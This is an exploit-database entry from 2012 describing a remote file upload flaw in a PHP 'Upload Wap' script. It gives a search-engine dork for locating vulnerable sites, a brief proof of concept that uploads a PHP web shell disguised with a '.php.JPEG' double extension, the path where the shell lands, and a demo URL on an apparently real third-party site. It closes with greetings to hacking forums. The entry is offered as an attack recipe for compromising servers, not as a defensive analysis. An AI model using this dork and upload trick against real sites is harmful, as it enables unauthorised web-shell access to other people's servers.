id: 18366
date: 05/27/2012
title: Upload Wap Remote File Upload Vulnerability
author: Dr.SiLnT HilL
cves: 

-------------------------------------------------------------------+
# Exploit Title : Upload Wap Remote File UpLoad
# Author        : Dr.SiLnT HilL
# Version       : all
# Dork          : inurl:"/upload/jpeg.php"
# Tested on     : Window xp , pc3
# Site          : Hack-School.com
# MaiL          : Eghack@live.com
+----------------------------------------------------------------------------------+

+-------------------[ Exploit by Dr.SiLnT HilL ]-----------------------------------+

+> p0c :

http://localhost/upload/jpeg.php : upload file jpeg l shell.php.JPEG


Demo :

http://cr.000space.com/upload/jpeg

Upload  Ev!L sh.php.JPEG 

Folder Shell : upload/jpeg/sh.php.JPEG

+----------------------------------------------------------------------------------------------------------------------------------+
TnKs To :

[#1337day.com Inj3ct0r Exploit DataBase 
| Mego | The MMa | Mr.Asla3eek | Soly HacKer | IraQeN H4X0rZ And All Froums Hack-School
#################################



#  0day.today [2023-03-26]  #